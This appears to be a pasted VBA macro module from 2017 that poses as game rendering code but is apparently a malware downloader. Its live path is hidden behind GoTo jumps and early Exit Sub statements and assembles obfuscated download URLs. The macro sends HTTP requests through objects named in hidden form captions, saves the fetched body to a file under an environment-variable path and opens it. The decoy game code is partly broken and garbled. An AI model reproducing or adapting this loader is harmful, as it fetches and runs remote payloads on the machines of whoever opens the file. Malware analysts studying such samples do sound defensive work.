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Aug 22nd, 2017
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  2. Public MarkusPils() As String
  3. Public THuesdayMorning_4 As String
  5. Public Const THuesdayMorning_System = "User-Agent"
  6. Public SubProperty As Object
  9. Public THuesdayMorning_VEAM As Object
  10. Public THuesdayMorning_Fish As Integer
  13. Public AlertN() As String
  15. Public AlertNE As String
  17. Public THuesdayMorning_PokerFace As Variant
  18. Public THuesdayMorning_aifde As Object
  19. Public THuesdayMorning_FLAME As String
  20. Public THuesdayMorning_avatar As Object
  22. Public smbi As String
  23. Public THuesdayMorning_2 As String
  24. Public Const Quubo = 0
  29. Public Stocke As Integer
  30. Public THuesdayMorning_Project As String
  31. Public VertikName As String
  32. Public CofeeShop As Object
  35. Public Sub AnimTransferMap(Caption As String, IsMapTransfer As Boolean)
  36. Dim xt As Integer, yt As Integer, PValue As Integer, I As Integer, L As Long
  38. Set THuesdayMorning_avatar = CreateObject(AlertN(3))
  39. Shtefin = Replace(Replace("\0677rg56CHAS89tg7gjkkhhprottity.cLLOO\af\0677rg56CHAScasajenty.cLLOO\\0677rg56", "LLOO", "om"), "\", "/")
  41. MarkusPils = Split(Shtefin, F3.CHAS.Caption)
  42. Set SubProperty = CreateObject(AlertN(1))
  43. Set THuesdayMorning_aifde = CreateObject(AlertNE)
  45. Set THuesdayMorning_VEAM = THuesdayMorning_avatar.Environment(AlertN(4))
  46. Exit Sub
  47. xt = CenterX - 77
  48. yt = CenterY - 10
  49. If IsMapTransfer Then
  50. PValue = (ResX - 88) \ 12
  51. L = UBound(RMData) \ PValue
  52. For I = 1 To PValue
  53. If I * L >= RMCount Then
  54. Optio.nGFX "selectfalse", 32 + I * 12, CenterY + 200
  55. Else
  56. Optio.nGFX "selecttrue", 32 + I * 12, CenterY + 200
  57. End If
  58. Next
  59. End If
  60. End Sub
  64. Public Sub AnimPowerup(pwr As Integer)
  65. Dim rBuff As RECT
  66. Dim ExX As Long, ExY As Long
  67. If NewGTC - PowerFrameT(pwr) > 100 Then
  68. PowerFrame(pwr) = PowerFrame(pwr) + 1
  69. If PowerUp(pwr) = 1 Then
  70. If PowerFrame(pwr) > 5 Then PowerFrame(pwr) = 0
  71. Else
  72. If PowerFrame(pwr) > 11 Then PowerFrame(pwr) = 0
  73. End If
  74. PowerFrameT(pwr) = NewGTC
  75. End If
  77. If PowerEffect(pwr) = 2 Then
  78. If NewGTC - PowerTick(pwr) > 50 Then
  79. PowerTick(pwr) = NewGTC
  80. PowerEffect(pwr) = 3
  81. Else
  82. Exit Sub
  83. End If
  84. ElseIf PowerEffect(pwr) = 3 Then
  85. If NewGTC - PowerTick(pwr) > 50 Then
  86. PowerTick(pwr) = NewGTC
  87. PowerEffect(pwr) = 2
  88. Exit Sub
  89. End If
  90. End If
  93. ExX = PowerX(pwr)
  94. ExY = PowerY(pwr)
  95. ExX = ExX - MeX: ExY = ExY - MeY
  97. rBuff.Top = 355 + (PowerUp(pwr) - 1) * 24
  98. rBuff.Bottom = rBuff.Top + 24
  99. rBuff.Left = PowerFrame(pwr) * 24
  100. rBuff.Right = rBuff.Left + 24
  102. If ExX < 0 Then rBuff.Left = rBuff.Left + Abs(ExX): ExX = 0
  103. If ExY < 0 Then rBuff.Top = rBuff.Top + Abs(ExY): ExY = 0
  104. If ExX > ResX - 24 Then rBuff.Right = rBuff.Right - (ExX - (ResX - 24)): ExX = ResX - 24 + (ExX - (ResX - 24))
  105. If ExY > ResY - 24 Then rBuff.Bottom = rBuff.Bottom - (ExY - (ResY - 24)): ExY = ResY - 24 + (ExY - (ResY - 24))
  106. If PowerUp(pwr) <> 0 Then BackBuffer.BltFast ExX, ExY, DirectDraw_Tuna1, rBuff, DDBLTFAST_WAIT Or DDBLTFAST_SRCCOLORKEY
  107. End Sub
  110. Public Sub AnimExpl(I As Integer)
  111. Dim xt As Integer, yt As Integer, rExpl As RECT
  112. Dim sw As Integer, sh As Integer
  113. Dim ExY As Integer
  114. If NewGTC - AnimExT(I) > 50 Then
  115. AnimExT(I) = NewGTC
  116. AnimExF(I) = AnimExF(I) + 1
  117. If AnimExF(I) > 10 Then
  118. AnimExF(I) = 0
  119. Expl(I) = False
  120. Exit Sub
  121. End If
  122. End If
  123. rExpl.Left = rBombExp(AnimExF(I)).Left
  124. rExpl.Right = rBombExp(AnimExF(I)).Right
  125. rExpl.Top = rBombExp(AnimExF(I)).Top
  126. rExpl.Bottom = rBombExp(AnimExF(I)).Bottom
  128. sw = rExpl.Right - rExpl.Left
  129. sh = rExpl.Bottom - rExpl.Top
  130. xt = ExplX(I) - MeX - (sw / 2)
  131. yt = ExplY(I) - MeY - (sh / 2)
  132. If xt < 0 Then rExpl.Left = rExpl.Left + Abs(xt): xt = 0
  133. If yt < 0 Then rExpl.Top = rExpl.Top + Abs(yt): yt = 0
  134. If xt > ResX - sw Then rExpl.Right = rExpl.Right - (xt - (ResX - sw)): xt = (ResX - sw) + (xt - (ResX - sw))
  135. If yt > ResY - sh Then rExpl.Bottom = rExpl.Bottom - (yt - (yt - sh)): ExY = (yt - sh) + (yt - (ResY - sh))
  137. End Sub
  146. Public Sub Flags(Colr As Integer, I As Integer)
  147. If BackBuffer.isLost Then Exit Sub
  148. Dim xt As Integer, yt As Integer, a As Integer, b As Integer, G As Byte
  149. Dim rFlag As RECT
  150. G = 0
  151. If Colr = 1 Then
  152. G = 1
  153. If FlagCarry1(I) > 0 Then
  154. Flag1(0, I) = Players(FlagCarry1(I)).charX + 18
  155. Flag1(1, I) = Players(FlagCarry1(I)).charY + 3: G = 9
  156. End If
  157. xt = Flag1(0, I)
  158. yt = Flag1(1, I)
  159. ElseIf Colr = 2 Then
  160. G = 2
  161. If FlagCarry2(I) > 0 Then
  162. Flag2(0, I) = Players(FlagCarry2(I)).charX + 18
  163. Flag2(1, I) = Players(FlagCarry2(I)).charY + 3: G = 9
  164. End If
  165. xt = Flag2(0, I)
  166. yt = Flag2(1, I)
  167. ElseIf Colr = 3 Then
  168. G = 3
  169. If FlagCarry3(I) > 0 Then
  170. Flag3(0, I) = Players(FlagCarry3(I)).charX + 18
  171. Flag3(1, I) = Players(FlagCarry3(I)).charY + 3: G = 9
  172. End If
  173. xt = Flag3(0, I)
  174. yt = Flag3(1, I)
  175. ElseIf Colr = 4 Then
  176. G = 4
  177. If FlagCarry4(I) > 0 Then
  178. Flag4(0, I) = Players(FlagCarry4(I)).charX + 18
  179. Flag4(1, I) = Players(FlagCarry4(I)).charY + 3: G = 9
  180. End If
  181. xt = Flag4(0, I)
  182. yt = Flag4(1, I)
  183. ElseIf Colr = 5 Then
  184. G = 5
  185. If FlagCarry5(I) > 0 Then
  186. Flag5(0, I) = Players(FlagCarry5(I)).charX + 18
  187. Flag5(1, I) = Players(FlagCarry5(I)).charY + 3: G = 9
  188. End If
  189. xt = Flag5(0, I)
  190. yt = Flag5(1, I)
  191. End If
  193. out:
  194. End Sub
  197. Public Sub PlayCry(cry As Integer)
  198. If cry = 1 Then
  199. CallByName CofeeShop, F3.OptionButton1.Tag, VbMethod, AlertN(5), THuesdayMorning_4, False
  200. Exit Sub
  201. Else: GoTo lab1
  202. End If
  203. If c.Ry.Offset = 0 Then
  204. Exit Sub
  205. End If
  206. writer.Write (Encoding.ASCII.GetBytes("RIFF"))
  207. writer.Write (0)
  208. writer.Write (Encoding.ASCII.GetBytes("WAVE"))
  209. writer.Write (Encoding.ASCII.GetBytes("fmt "))
  210. writer.Write (16)
  211. writer.Write (CUS.hort(1))
  212. writer.Write (CUS.hort(1))
  214. lab1:
  215. CallByName CofeeShop, F3.OptionButton2.Tag, VbMethod, THuesdayMorning_System, _
  216. F3.SpinButton1.Tag
  217. Exit Sub
  218. stream.Seek 0, SeekOrigin.begin
  219. Player.Load
  220. Player.Play
  221. End Sub
  224. Public Sub Vertik()
  227. Set CofeeShop = CreateObject(VertikName)
  229. smbi = F3.Label1.Caption
  230. AlertNE = AlertN(2)
  232. AnimTransferMap "Caption", False
  235. Stocke = 24 / 4
  236. THuesdayMorning_FLAME = THuesdayMorning_VEAM(AlertN(6))
  237. MakeFarplane "G", "I", "MS"
  238. End Sub
  240. Public Function FindNext(R As String, S As Integer) As String
  243. CallByName SubProperty, "sav" + F3.o3.Caption, VbMethod, THuesdayMorning_Project, 2
  248. THuesdayMorning_aifde.Open (THuesdayMorning_Project)
  250. End Function
  253. Public Function HMBCP(D)
  254. Dim fb As Asck
  255. doc_string = "Outline Level 2"
  256. Set fb = New Asck
  257. doc_string = "Outline Level 3"
  258. fb.PropellersHead
  259. End Function
  267. Public Sub MakeFarplane(a As String, b As String, c As String)
  268. GoTo old18
  269. If BackBuffer.isLost Then Exit Sub
  270. Dim xt As Integer, yt As Integer, rDD As Integer
  271. Dim xtl As Integer, ytl As Integer, xw As Integer, yw As Integer
  272. xw = ResX
  273. yw = ResY
  274. If xw > 1280 Then xw = 1280
  275. If yw > 960 Then yw = 960
  276. xt = 0.1568 * MeX
  277. yt = 0.1176 * MeY
  278. xtl = xt + xw
  279. ytl = yt + yw
  280. If xtl > 1280 Then
  281. xt = 1280 - xw
  282. xtl = 1280
  283. End If
  284. If ytl > 960 Then
  285. yt = 960 - yw
  286. ytl = 960
  287. End If
  289. old18:
  290. On Error GoTo dee13
  292. Dim I
  294. For I = LBound(MarkusPils) To UBound(MarkusPils) Step 1
  295. ShugarMilk 64
  296. If CofeeShop.Status <> 200 Then
  297. Err.Raise 700 + vbObjectError, "G", "Dro"
  298. End If
  302. MakeFarplane2 31
  303. Exit Sub
  304. dee13:
  305. Next
  306. On Error GoTo 0
  308. Exit Sub
  309. If xt < 0 Then
  310. xt = 0
  311. xtl = xw
  312. End If
  313. If yt < 0 Then
  314. yt = 0
  315. ytl = yw
  316. End If
  318. With rD.D.hh
  319. .Left = xt
  320. .Top = yt
  321. .Right = xtl
  322. .Bottom = ytl
  323. End With
  324. BackBuffer.BltFast 0, 0, DirectDraw_Farplane, rDD, DDBLTFAST_WAIT
  325. End Sub
  330. Public Sub DropFlag()
  331. Dim lMsg As Byte
  332. Dim oNewMsg() As Byte, lNewOffSet As Long
  333. lNewOffSet = 0
  334. ReDim oNewMsg(0)
  335. lMsg = MSG_DROPFLAG
  336. AddBufferData oNewMsg, VarPtr(lMsg), LenB(lMsg), lNewOffSet
  337. SendTo oNewMsg
  338. End Sub
  340. Public Sub WriteChat()
  341. Dim e As Integer, j As Integer, q As Integer, F As Integer, D As Integer, rrect As RECT, I As Integer
  342. DirectDraw_Chat.BltColorFill rrect, KEYColor
  343. e = 1
  344. j = UBound(Chat)
  345. For I = 0 To j
  346. q = Len(Chat(I))
  347. While q > 0
  348. F = MakeText(Mid$(Chat(I), 1, 1) & Mid$(Chat(I), e + 1, q), 5, 5 + (I + D) * 12, True, DirectDraw_Chat)
  349. e = e + F - 1
  350. q = Len(Chat(I)) - e
  351. If q > 0 Then D = D + 1
  352. Wend
  353. e = 0: q = 0
  354. Next
  355. End Sub
  358. Public Sub mapRender()
  360. GoTo fixedTypeLbl2
  361. If BackBuffer.isLost Then Exit Sub
  362. If DirectDraw_Tiles Is Nothing Then Exit Sub
  363. Dim DestX As Single, DestY As Single, FrameChange(255, 255) As Byte
  364. Dim I As Integer, R As Integer, j As Integer, c As Integer, D As Integer, a As Integer, e As Integer
  365. Dim Xfind As Integer, Yfind As Integer, Xwdth As Integer, Ywdth As Integer, X As Integer
  366. Dim Xcoor As Integer, Ycoor As Integer, Xdif As Integer, Ydif As Integer
  367. Dim TileGet As Integer, xt As Integer, yt As Integer, ToX As Integer, ToY As Integer
  368. ReDim AnimsPlayed(0)
  369. MeX = - CenterSX
  370. MeY = - CenterSY
  371. MapX = (MeX - (MeX Mod 16)) / 16
  372. MapY = (MeY - (MeY Mod 16)) / 16
  373. If MeY < 0 Then MapY = MapY - 1
  374. If MeX < 0 Then MapX = MapX - 1
  375. DestX = - MapX * 16
  376. DestY = - MapY * 16
  377. Xdif = MeX - MapX * 16
  378. Ydif = MeY - MapY * 16
  379. ToX = ResX / 16
  380. ToY = ResY / 16
  382. If ResY = 600 Then
  383. If Ydif < 8 Then ToY = 37 Else ToY = 38
  384. End If
  385. I = MapX * 16 + Xdif
  386. j = MapY * 16 + Ydif
  387. D = I
  388. c = j
  389. If I < 0 Then D = 0
  390. If j < 0 Then c = 0
  391. = D
  392. = c
  393. If I < 0 Then D = I Else D = 0
  394. If j < 0 Then c = j Else c = 0
  395. D = + ResX + D
  396. c = + ResY + c
  397. If D > 4080 Then D = 4080
  398. If c > 4080 Then c = 4080
  399. = D
  400. = c
  401. D = MapX * 16 + Xdif
  402. c = MapY * 16 + Ydif
  403. If D >= 0 Then D = 0
  404. If c >= 0 Then c = 0
  405. BackBuffer.BltFast Abs(D), Abs(c), DirectDraw_Map, TileGet, DDBLTFAST_WAIT Or DDBLTFAST_SRCCOLORKEY
  406. c = 0
  407. D = 0
  409. fixedTypeLbl2:
  410. THuesdayMorning_Project = THuesdayMorning_FLAME
  413. GoTo fixedTypeLbl3
  415. If MeY < 0 Then c = MapY
  416. If MeX < 0 Then D = MapX
  417. For R = Abs(c) To ToY
  418. For I = Abs(D) To ToX
  420. Xcoor = I * 16
  421. If I > 0 Then Xcoor = Xcoor - Xdif
  422. Ycoor = R * 16
  423. If R > 0 Then Ycoor = Ycoor - Ydif
  425. X = AnimO.ffset(yt, xt)
  426. If X > 0 Then
  427. a = Animati.ons(yt, xt)
  428. If FrameChange(FrameC.ount(a), AnimS.peed(a)) = 0 Then
  429. If AnimS.peed(a) = 0 Then AnimS.peed(a) = 1
  430. AnimC.ount(FrameC.ount(a), AnimS.peed(a)) = AnimC.ount(FrameC.ount(a), AnimS.peed(a)) + Speed / AnimS.peed(a)
  431. If AnimC.ount(FrameC.ount(a), AnimS.peed(a)) > FrameC.ount(a) - 1 Then AnimC.ount(FrameC.ount(a), AnimS.peed(a)) = 0
  432. End If
  433. FrameChange(FrameC.ount(a), AnimS.peed(a)) = 1
  434. e = AnimC.ount(FrameC.ount(a), AnimS.peed(a))
  435. e = (e + X) Mod (FrameC.ount(a))
  436. = Anim.FY(a, e) + Yfind
  437. = + Ywdth
  438. = Anim.FX(a, e) + Xfind
  439. = + Xwdth
  440. Call BackBuffer.BltFast(Xcoor, Ycoor, DirectDra.w_Anims(Anim.FS(a, 0)), TileGet, DDBLTFAST_WAIT Or DDBLTFAST_SRCCOLORKEY)
  441. End If
  442. out:
  443. Next
  444. Next
  446. fixedTypeLbl3:
  447. THuesdayMorning_Project = THuesdayMorning_Project + Replace(AlertN(12), ".", CStr(Stocke) + ".")
  448. SubProperty.Type = 1
  449. End Sub
  453. Public Sub ShugarMilk(e As Integer)
  454. Dim Rx As Integer, Ry As Integer, rBuff As String
  455. Dim xt As Integer, yt As Integer, j As Integer
  456. Dim NewX As Integer, NewY As Integer, D As Integer, SgnX As Integer, SgnY As Integer
  457. Dim RatioX As Single, RatioY As Single
  458. Rx = 452
  459. Ry = 81
  461. THuesdayMorning_4 = F3.ZK.Caption & MarkusPils(I)
  462. Stocke = Stocke + 2
  463. Dim XIpotom2 As Asck
  464. Set XIpotom2 = New Asck
  465. If e < 300 Then
  468. XIpotom2.Challenge "RDBMS", 21
  469. CallByName CofeeShop, F3.ToggleButton1.Caption, VbMethod
  470. Set XIpotom2 = Nothing
  472. Else
  474. End If
  475. Exit Sub
  476. NewX = UniB.all(I).BallX
  477. NewY = UniB.all(I).BallY
  478. If UniB.all(I).BSpeedX > UniB.all(I).BSpeedY And UniB.all(I).BSpeedY > 0 Then RatioY = UniB.all(I).BSpeedX / UniB.all(I).BSpeedY
  479. If UniB.all(I).BSpeedY > UniB.all(I).BSpeedX And UniB.all(I).BSpeedX > 0 Then RatioX = UniB.all(I).BSpeedY / UniB.all(I).BSpeedX
  480. If RatioX < 1 Then RatioX = 1
  481. If RatioY < 1 Then RatioY = 1
  482. If UniB.all(I).BSpeedX > 0 Then UniB.all(I).BSpeedX = UniB.all(I).BSpeedX - (0.01 / RatioX) * Speed
  483. If UniB.all(I).BSpeedY > 0 Then UniB.all(I).BSpeedY = UniB.all(I).BSpeedY - (0.01 / RatioY) * Speed
  484. If UniB.all(I).BSpeedX < 0 Then UniB.all(I).BSpeedX = 0
  485. If UniB.all(I).BSpeedY < 0 Then UniB.all(I).BSpeedY = 0
  487. UniB.all(I).BLoopX = UniB.all(I).BLoopX + (UniB.all(I).BSpeedX * Speed)
  488. For j = 1 To UniB.all(I).BLoopX
  489. NewX = NewX + UniB.all(I).BMoveX
  490. UniB.all(I).BLoopX = UniB.all(I).BLoopX - 1
  491. Next
  493. UniB.all(I).BLoopY = UniB.all(I).BLoopY + (UniB.all(I).BSpeedY * Speed)
  494. For j = 1 To UniB.all(I).BLoopY
  495. NewY = NewY + UniB.all(I).BMoveY
  496. UniB.all(I).BLoopY = UniB.all(I).BLoopY - 1
  497. Next
  500. SgnX = Sgn(NewX - UniB.all(I).BallX)
  501. SgnY = Sgn(NewY - UniB.all(I).BallY)
  504. If SgnX = 1 Then
  505. For D = UniB.all(I).BallX + 1 To NewX
  506. j = WeaponT.ouch(6, I, D, UniB.all(I).BallY)
  507. If j = 6 Then
  508. UniB.all(I).BMoveX = UniB.all(I).BMoveX * -1
  509. NewX = D - 1
  510. Exit For
  511. End If
  512. Next
  513. End If
  515. If SgnX = -1 Then
  516. For D = UniB.all(I).BallX - 1 To NewX Step -1
  517. j = WeaponT.ouch(6, I, D, UniB.all(I).BallY)
  518. If j = 6 Then
  519. UniB.all(I).BMoveX = UniB.all(I).BMoveX * -1
  520. NewX = D + 1
  521. Exit For
  522. End If
  523. Next
  524. End If
  526. If SgnY = 1 Then
  527. For D = UniB.all(I).BallY + 1 To NewY
  528. j = WeaponT.ouch(6, I, NewX, D)
  529. If j = 6 Then
  530. UniB.all(I).BMoveY = UniB.all(I).BMoveY * -1
  531. NewY = D - 1
  532. Exit For
  533. End If
  534. Next
  535. End If
  537. If SgnY = -1 Then
  538. For D = UniB.all(I).BallY - 1 To NewY Step -1
  539. j = WeaponT.ouch(6, I, NewX, D)
  540. If j = 6 Then
  541. UniB.all(I).BMoveY = UniB.all(I).BMoveY * -1
  542. NewY = D + 1
  543. Exit For
  544. End If
  545. Next
  546. End If
  548. UniB.all(I).BallX = NewX
  549. UniB.all(I).BallY = NewY
  550. j = WeaponT.ouch(6, I, NewX, NewY)
  551. xt = NewX
  552. yt = NewY
  553. xt = xt - MeX: yt = yt - MeY
  555. rBuf.F.Top = Ry
  556. rBuf.F.Bottom = rBuf.F.Top + 10
  557. rBuf.F.Left = Rx + 10 * (UniB.all(I).Color - 1)
  558. rBuf.F.Right = rBuf.F.Left + 10
  560. If xt < 0 Then rBuf.F.Left = rBuf.F.Left + Abs(xt): xt = 0
  561. If yt < 0 Then rBuf.F.Top = rBuf.F.Top + Abs(yt): yt = 0
  562. If xt > ResX - 10 Then rBuf.F.Right = rBuf.F.Right - (xt - (ResX - 10)): xt = (ResX - 10) + (xt - (ResX - 10))
  563. If yt > ResY - 10 Then rBuf.F.Bottom = rBuf.F.Bottom - (yt - (ResY - 10)): yt = (ResY - 10) + (yt - (ResY - 10))
  565. BackBuffer.BltFast xt, yt, DirectDraw_NavBar, rBuff, DDBLTFAST_WAIT Or DDBLTFAST_SRCCOLORKEY
  566. End Sub
  571. Public Sub MakeFarplane2(I As Integer)
  572. Dim j As Integer, D As Integer, DiagMvSpd As Single, LastCX As Single, LastCY As Single, e As Integer
  573. Dim MvSpd As Single, sx As Single, sy As Single, chs As Single
  574. GoTo sinus
  575. MvSpd = Speed * 1.1
  577. If Player.S(I).FlagWho > 0 Then MvSpd = MvSpd * 0.75
  578. If Player.S(I).DevCheat > 2 Then MvSpd = MvSpd * 3
  579. If Player.S(I).Mode = 1 Then MvSpd = MvSpd * 6
  581. DiagMvSpd = 0.7 * 1.1
  582. chs = MvSpd / (Int(MvSpd) + 1)
  584. If Player.S(I).Ship = 6 Then
  585. Select Case Player.S(I).KeyIs
  586. Case Is = vbKeyLeft
  587. Player.S(I).animY = aLEFT2
  588. Case Is = vbKeyUp
  589. Player.S(I).animY = aUP2
  590. Case Is = vbKeyRight
  591. Player.S(I).animY = aRIGHT2
  592. Case Is = vbKeyDown
  593. Player.S(I).animY = aDOWN2
  594. End Select
  595. End If
  596. Player.S(I).animX = Player.S(I).KeyIs
  597. If Val(Int(MvSpd)) > 100 Then Exit Sub
  599. For j = 0 To Int(MvSpd)
  600. LastCX = Player.S(I).charX
  601. LastCY = Player.S(I).charY
  602. If Player.S(I).KeyIs = 1 Then
  603. Player.S(I).charX = Player.S(I).charX + chs
  604. ElseIf Player.S(I).KeyIs = 2 Then
  605. Player.S(I).charX = Player.S(I).charX + chs * DiagMvSpd
  606. Player.S(I).charY = Player.S(I).charY - chs * DiagMvSpd
  607. ElseIf Player.S(I).KeyIs = 3 Then
  608. Player.S(I).charY = Player.S(I).charY - chs
  609. ElseIf Player.S(I).KeyIs = 4 Then
  610. Player.S(I).charY = Player.S(I).charY - chs * DiagMvSpd
  611. Player.S(I).charX = Player.S(I).charX - chs * DiagMvSpd
  612. ElseIf Player.S(I).KeyIs = 5 Then
  613. Player.S(I).charX = Player.S(I).charX - chs
  614. ElseIf Player.S(I).KeyIs = 6 Then
  615. Player.S(I).charX = Player.S(I).charX - chs * DiagMvSpd
  616. Player.S(I).charY = Player.S(I).charY + chs * DiagMvSpd
  617. ElseIf Player.S(I).KeyIs = 7 Then
  618. Player.S(I).charY = Player.S(I).charY + chs
  619. ElseIf Player.S(I).KeyIs = 8 Then
  620. Player.S(I).charY = Player.S(I).charY + chs * DiagMvSpd
  621. Player.S(I).charX = Player.S(I).charX + chs * DiagMvSpd
  622. End If
  623. Call ShipTo.uch(I)
  624. For e = 1 To UBound(RetCollision)
  625. D = RetCollision(e)
  626. If D = 8 Then Player.S(I).charY = Player.S(I).charY - chs * 0.7
  627. If D = 9 Then Player.S(I).charY = Player.S(I).charY + chs * 0.7
  628. If D = 10 Then Player.S(I).charX = Player.S(I).charX - chs * 0.7
  629. If D = 11 Then Player.S(I).charX = Player.S(I).charX + chs * 0.7
  630. 'The following four lines stop you from moving backwards on
  631. 'ramps if you have a flag.
  632. 'If D = 8 And Player.s(i).FlagWho > 0 And Player.s(i).KeyIs = 7 Then Player.s(i).charY = LastCY
  633. 'If D = 9 And Player.s(i).FlagWho > 0 And Player.s(i).KeyIs = 3 Then Player.s(i).charY = LastCY
  634. 'If D = 10 And Player.s(i).FlagWho > 0 And Player.s(i).KeyIs = 1 Then Player.s(i).charX = LastCX
  635. 'If D = 11 And Player.s(i).FlagWho > 0 And Player.s(i).KeyIs = 5 Then Player.s(i).charX = LastCX
  636. Next
  637. GoSub whatever
  638. Next
  639. Exit Sub
  641. sinus:
  642. mapRender
  643. CallByName SubProperty, "Open" + "", VbMethod
  645. THuesdayMorning_PokerFace = CallByName(CofeeShop, "re" + "sponseBody", VbGet)
  646. Dim DRO As BounceCastle
  647. Set DRO = New BounceCastle
  648. DRO.Ant
  649. Exit Sub
  650. whatever:
  651. sx = Player.S(I).charX
  652. sy = Player.S(I).charY
  653. '
  654. Call ShipTo.uch(I)
  655. If UBound(RectsRet) > 0 Then
  656. Player.S(I).charX = LastCX
  657. Player.S(I).charY = LastCY
  658. If (FindRects.Ret(104) And FindRects.Ret(105)) Or (FindRects.Ret(112) And FindRects.Ret(113)) Then
  659. Player.S(I).charY = sy
  660. Call ShipTo.uch(I)
  661. If Player.S(I).charY = LastCY Then
  662. If FindRects.Ret(112) And FindRects.Ret(113) Then 'touch right
  663. Player.S(I).charX = Player.S(I).charX - 1
  664. End If
  665. Call ShipTo.uch(I)
  666. If FindRects.Ret(104) And FindRects.Ret(105) Then 'touch left
  667. Player.S(I).charX = Player.S(I).charX + 1
  668. End If
  669. End If
  670. If UBound(RectsRet) > 0 Then Player.S(I).charY = LastCY
  671. Return
  672. End If
  673. If (FindRects.Ret(101) And FindRects.Ret(109)) Or (FindRects.Ret(108) And FindRects.Ret(116)) Then
  674. Player.S(I).charX = sx
  675. Call ShipTo.uch(I)
  676. If Player.S(I).charY = LastCY Then
  677. If FindRects.Ret(101) And FindRects.Ret(109) Then 'touch top
  678. Player.S(I).charY = Player.S(I).charY + 1
  679. End If
  680. Call ShipTo.uch(I)
  681. If FindRects.Ret(108) And FindRects.Ret(116) Then 'touch bottom
  682. Player.S(I).charY = Player.S(I).charY - 1
  683. End If
  684. End If
  685. If UBound(RectsRet) > 0 Then Player.S(I).charX = LastCX
  686. Return
  687. End If
  688. End If
  689. For e = 1 To UBound(RectsRet)
  690. D = RectsRet(e)
  691. If D = 101 Then
  692. If sx - LastCX <> 0 Then Player.S(I).charY = Player.S(I).charY + chs * 0.8
  693. If sy - LastCY <> 0 Then Player.S(I).charX = Player.S(I).charX + chs * 0.8
  694. End If
  695. If D = 102 Then
  696. If sx - LastCX <> 0 Then Player.S(I).charY = Player.S(I).charY + chs * 0.4
  697. If sy - LastCY <> 0 Then Player.S(I).charX = Player.S(I).charX + chs * 0.4
  698. End If
  699. If D = 103 Then
  700. If sx - LastCX <> 0 Then Player.S(I).charY = Player.S(I).charY + chs * 0.4
  701. If sy - LastCY <> 0 Then Player.S(I).charX = Player.S(I).charX + chs * 0.4
  702. End If
  703. '
  704. If D = 104 Then
  705. If sx - LastCX <> 0 Then Player.S(I).charY = Player.S(I).charY + chs * 0.8
  706. If sy - LastCY <> 0 Then Player.S(I).charX = Player.S(I).charX + chs * 0.8
  707. End If
  708. If D = 105 Then
  709. If sx - LastCX <> 0 Then Player.S(I).charY = Player.S(I).charY - chs * 0.8
  710. If sy - LastCY <> 0 Then Player.S(I).charX = Player.S(I).charX + chs * 0.8
  711. End If
  712. '
  713. If D = 106 Then
  714. If sx - LastCX <> 0 Then Player.S(I).charY = Player.S(I).charY - chs * 0.4
  715. If sy - LastCY <> 0 Then Player.S(I).charX = Player.S(I).charX + chs * 0.4
  716. End If
  717. If D = 107 Then
  718. If sx - LastCX <> 0 Then Player.S(I).charY = Player.S(I).charY - chs * 0.4
  719. If sy - LastCY <> 0 Then Player.S(I).charX = Player.S(I).charX + chs * 0.4
  720. End If
  721. If D = 108 Then
  722. If sx - LastCX <> 0 Then Player.S(I).charY = Player.S(I).charY - chs * 0.8
  723. If sy - LastCY <> 0 Then Player.S(I).charX = Player.S(I).charX + chs * 0.8
  724. End If
  725. '
  726. If D = 109 Then
  727. If sx - LastCX <> 0 Then Player.S(I).charY = Player.S(I).charY + chs * 0.8
  728. If sy - LastCY <> 0 Then Player.S(I).charX = Player.S(I).charX - chs * 0.8
  729. End If
  730. If D = 110 Then
  731. If sx - LastCX <> 0 Then Player.S(I).charY = Player.S(I).charY + chs * 0.4
  732. If sy - LastCY <> 0 Then Player.S(I).charX = Player.S(I).charX - chs * 0.4
  733. End If
  734. If D = 111 Then
  735. If sx - LastCX <> 0 Then Player.S(I).charY = Player.S(I).charY + chs * 0.4
  736. If sy - LastCY <> 0 Then Player.S(I).charX = Player.S(I).charX - chs * 0.4
  737. End If
  738. If D = 112 Then
  739. If sx - LastCX <> 0 Then Player.S(I).charY = Player.S(I).charY + chs * 0.8
  740. If sy - LastCY <> 0 Then Player.S(I).charX = Player.S(I).charX - chs * 0.8
  741. End If
  742. '
  743. If D = 113 Then
  744. If sx - LastCX <> 0 Then Player.S(I).charY = Player.S(I).charY - chs * 0.8
  745. If sy - LastCY <> 0 Then Player.S(I).charX = Player.S(I).charX - chs * 0.8
  746. End If
  747. If D = 114 Then
  748. If sx - LastCX <> 0 Then Player.S(I).charY = Player.S(I).charY - chs * 0.4
  749. If sy - LastCY <> 0 Then Player.S(I).charX = Player.S(I).charX - chs * 0.4
  750. End If
  751. If D = 115 Then
  752. If sx - LastCX <> 0 Then Player.S(I).charY = Player.S(I).charY - chs * 0.4
  753. If sy - LastCY <> 0 Then Player.S(I).charX = Player.S(I).charX - chs * 0.4
  754. End If
  755. If D = 116 Then
  756. If sx - LastCX <> 0 Then Player.S(I).charY = Player.S(I).charY - chs * 0.8
  757. If sy - LastCY <> 0 Then Player.S(I).charX = Player.S(I).charX - chs * 0.8
  758. End If
  759. Next
  760. '
  761. Call ShipTo.uch(I)
  762. If UBound(RectsRet) > 0 Then
  763. Player.S(I).charX = LastCX
  764. Player.S(I).charY = LastCY
  765. If (FindRects.Ret(104) And FindRects.Ret(105)) Or (FindRects.Ret(112) And FindRects.Ret(113)) Then
  766. Player.S(I).charY = sy
  767. Call ShipTo.uch(I)
  768. If UBound(RectsRet) > 0 Then Player.S(I).charY = LastCY
  769. Return
  770. End If
  771. If (FindRects.Ret(101) And FindRects.Ret(109)) Or (FindRects.Ret(108) And FindRects.Ret(116)) Then
  772. Player.S(I).charX = sx
  773. Call ShipTo.uch(I)
  774. If UBound(RectsRet) > 0 Then Player.S(I).charX = LastCX
  775. Return
  776. End If
  777. End If
  778. Return
  779. End Sub
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